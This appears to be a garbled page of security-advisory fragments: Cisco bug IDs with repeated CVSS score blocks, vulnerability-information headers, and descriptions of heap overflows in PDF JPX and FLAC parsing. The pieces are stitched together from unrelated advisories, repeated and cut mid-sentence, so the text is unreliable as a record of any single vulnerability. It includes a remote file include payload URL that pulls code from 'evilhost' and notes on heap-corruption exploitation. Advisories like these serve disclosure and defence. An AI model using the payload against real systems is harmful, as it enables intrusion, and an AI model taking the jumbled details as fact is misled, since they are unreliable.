<< Previous Next >>
exploitable
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtc61990 - Coredump may be experienced when processing
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCso02147 ("NAT of SIP over TCP Vulnerability")
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtq89842 ("CUP Server PE Vulnerable to XML Entity Expansion Attack")
Vendors contacted: IBM Corp.
Release mode: COORDINATED RELEASE
*Vulnerability Information*
Class: Input validation error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: N/A
CVE Name: N/A
*Vulnerability Description*
http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php
1.2 Local File Include vulnerability found in script includes/events_application_top.php
Successful exploitation requires that "register_globals" is enabled.
Code
****
#################################################
Authentication None
Confidentiality Impact None
Availability Impact Complete
CVSS Temporal Score - 6.7
Exploitability Functional
Remediation Level Official-Fix
Report Confidence Confirmed
CSCta33973: Cisco IOS Software Crafted BGP Update Message Vulnerability
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtq63992 - CSM Arbitrary command execution vulnerability
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtt07949 - Cisco Wireless LAN Controllers IPv6 Denial of Service Vulnerability
privileges of the current user.
The vulnerability occurs when processing the Jp2c stream of a JpxDecode
encoded data stream within a PDF file. During the processing of a
JPC_MS_RGN marker, an integer sign extension may cause a bounds check
to be bypassed. This results in an exploitable memory corruption
vulnerability.
III. ANALYSIS
Exploitation of this vulnerability allows an attacker to execute
Typically, heap based buffer overflows can be difficult to exploit due
to modern heap implementations that perform heap integrity checks.
However, Abode Reader and Acrobat use a custom heap allocator which can
be abused to write arbitrary values to arbitrary locations. Labs testing
has demonstrated this vulnerability is highly exploitable.
JavaScript is not required to exploit this vulnerability, however, it
does make exploitation simpler.
IV. DETECTION
software.
Whenever vulnerable software open or process a malformed FLAC file, they
use the size fields for reference points to allocate memory (malloc) and
write the contents of these files into those memory buffers. Setting
these values to an overly large value, such as 0xFFFFFFFF, could cause
an exploitable condition. Passing a size of 0xFFFFFFFF would cause a
malloc(0) immediately followed by a buffer overflow on the read. This
results in an exploitable heap overflow. Exploitation is dependent on
the data allocation location, heap structure and error handlers of the
affected software. After overwriting a large amount of memory and
pointers with arbitrary data, code execution could then be redirected to
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsu05515 - SD Camera Web Server Will Display any File on System
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsz40392 - CCM: Coredump in sipSafeStrlen from malicious INVITE
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCtc47823 - CCM Core at invalid Line# in SCCP RegAvailableLines and FwdStatReq
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCee72997 - P1 SA stuck in KEY_EXCH forever
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsw40789 - SSH connections denial of service vulnerability
+-----------------------------------------------------
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.0
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* Crash handling invalid post for webauth (CSCsq44516)
Confidentiality Impact None
Integrity Impact None
Availability Impact Complete
CVSS Temporal Score - 6.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCsk32606 - Malformed SIP packet can crash device
CSCsk40030 - Malformed Session Attribute can crash device
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtc46008 ("Privilege Escalation on DMM")
Confidentiality Impact None
Integrity Impact None
Availability Impact Complete
CVSS Temporal Score - 6.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCsz43987 - IOS coredump when sending crafted packets
Confidentiality Impact None
Integrity Impact None
Availability Impact Complete
CVSS Temporal Score - 6.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCtb54493 - HTTP, RTSP, and SIP Inspection DoS Vulnerability
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - Partial
CVSS Temporal Score - 6.2
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97085 - Java RMI Command Injection
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCto63060 - Open Query Interface
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtq67899 - Cisco Unity Denial Of Service Vulnerability
2. *Vulnerability Information*
Class: External Initialization of Trusted Variables [CWE-454]
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-3840
Release mode: User release
*Vulnerability Information*
Class: Input Validation Error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Client-side Exploitable: No
Bugtraq ID: 27944
CVE Name: CVE-2008-0923
2. *Vulnerability Information*
Class: Buffer Overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-2562
Bugtraq ID: 42199
<<Previous Next>>
|
